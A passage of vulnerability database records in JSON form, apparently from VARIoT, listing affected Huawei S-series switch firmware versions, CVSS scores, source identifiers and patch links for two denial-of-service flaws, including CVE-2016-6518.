                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r001c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2016-6518",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The vendor reported the issue.",
      sources: [
         {
            db: "BID",
            id: "92968",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2016-6518",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Partial",
                  baseScore: 5,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2016-6518",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "HIGH",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 2.6,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 4.9,
                  id: "CNVD-2016-08070",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "LOW",
                  trust: 0.6,
                  vectorString: "AV:N/AC:H/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-95338",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:P",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2016-6518",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2016-6518",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2016-08070",
                  trust: 0.6,
                  value: "LOW",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201609-365",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-95338",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            db: "VULHUB",
            id: "VHN-95338",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            db: "NVD",
            id: "CVE-2016-6518",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Memory leak in Huawei S9300, S5300, S5700, S6700, S7700, S9700, and S12700 devices allows remote attackers to cause a denial of service (memory consumption and restart) via a large number of malformed packets. The Huawei S7700, S9300, S9700, and S12700 are Huawei's intelligent routing switches. A remote denial of service vulnerability exists in several HuaweiSwitches. The following products and versions are affected: Huawei S9300 V200R001C00 , V200R003C00 , V200R005C00 , V200R006C00 , V200R008C00 , S5300 V200R001C00 , V200R002C00 , V200R003C00 , V200R005C00 , V200R005C01 , V200R005C02 , V200R006C00 , V200R007C00 , V200R008C00 , S5700 V200R001C00 , V200R001C01 , V200R002C00 , V200R003C00 , V200R003C02 , V200R005C00 , V200R006C00 , V200R008C00 , S6300 V200R001C00 , V200R002C00 , V200R003C00 , V200R005C00 , V200R005C01 , V200R005C02 , V200R008C00 , S6700 V200R001C00 , V200R001C01 , V200R002C00 , V200R003C00 , V200R008C00 , S7700 V200R001C00 , V200R002C00 , V200R003C00 , V200R005C00 , V200R006C00 , V200R008C00 , S9700 V200R001C00 , V200R001C01 , V200R002C00 , V200R003C00, V200R005C00, V200R006C00, V200R008C00, S12700 V200R005C00, V200R006C00, V200R008C00",
      sources: [
         {
            db: "NVD",
            id: "CVE-2016-6518",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            db: "BID",
            id: "92968",
         },
         {
            db: "VULHUB",
            id: "VHN-95338",
         },
      ],
      trust: 2.52,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2016-6518",
            trust: 3.4,
         },
         {
            db: "BID",
            id: "92968",
            trust: 2.6,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201609-365",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-95338",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            db: "VULHUB",
            id: "VHN-95338",
         },
         {
            db: "BID",
            id: "92968",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            db: "NVD",
            id: "CVE-2016-6518",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
   },
   id: "VAR-201609-0096",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            db: "VULHUB",
            id: "VHN-95338",
         },
      ],
      trust: 1.5096517435897436,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
      ],
   },
   last_update_date: "2023-12-18T13:39:10.113000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "huawei-sa-20160914-01-sep",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160914-01-sep-en",
         },
         {
            title: "Patches for several HuaweiSwitches Remote Denial of Service Vulnerabilities",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/81677",
         },
         {
            title: "Multiple Huawei Repair measures for product remote denial of service vulnerability",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=64163",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-399",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-95338",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            db: "NVD",
            id: "CVE-2016-6518",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.6,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160914-01-sep-en",
         },
         {
            trust: 2.3,
            url: "http://www.securityfocus.com/bid/92968",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-6518",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-6518",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            db: "VULHUB",
            id: "VHN-95338",
         },
         {
            db: "BID",
            id: "92968",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            db: "NVD",
            id: "CVE-2016-6518",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            db: "VULHUB",
            id: "VHN-95338",
         },
         {
            db: "BID",
            id: "92968",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            db: "NVD",
            id: "CVE-2016-6518",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-09-26T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            date: "2016-09-26T00:00:00",
            db: "VULHUB",
            id: "VHN-95338",
         },
         {
            date: "2016-09-14T00:00:00",
            db: "BID",
            id: "92968",
         },
         {
            date: "2016-10-04T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            date: "2016-09-26T15:59:01.780000",
            db: "NVD",
            id: "CVE-2016-6518",
         },
         {
            date: "2016-09-19T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-09-26T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            date: "2016-09-28T00:00:00",
            db: "VULHUB",
            id: "VHN-95338",
         },
         {
            date: "2016-09-14T00:00:00",
            db: "BID",
            id: "92968",
         },
         {
            date: "2016-10-04T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            date: "2016-09-28T13:48:45.757000",
            db: "NVD",
            id: "CVE-2016-6518",
         },
         {
            date: "2016-09-27T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Service disruption on devices  (DoS) Vulnerabilities",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "resource management error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
      trust: 0.6,
   },
}

var-201906-0055
Vulnerability from variot

Some Huawei S series switches have a DoS vulnerability. An unauthenticated remote attacker can send crafted packets to the affected device to exploit this vulnerability. Due to insufficient verification of the packets, successful exploitation may cause the device reboot and denial of service (DoS) condition. (Vulnerability ID: HWPSIRT-2019-03109). Vendors have confirmed this vulnerability HWPSIRT-2019-03109 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiS12700 is an enterprise-class switch product from China's Huawei company. The vulnerability stems from the program's insufficient verification of specific parameters of Http messages. The following products and versions are affected: Huawei S12700 V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R010C00 Version, V200R012C00 Version, V200R013C00 Version, V200R011C10 Version; S1700 V200R008C00 Version, V200R009C00 Version, V200R010C00 Version, V200R011C10 Version, V200R012C00 Version, V200R013C00 version; S2300 V200R003C00 version, etc

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0055",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s1700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9300x",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s7900",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s600-e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s1700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s600-e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s600-e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s600-e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9300x",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s1700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s1700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s600-e",
            scope: "eq",
            trust: 1,
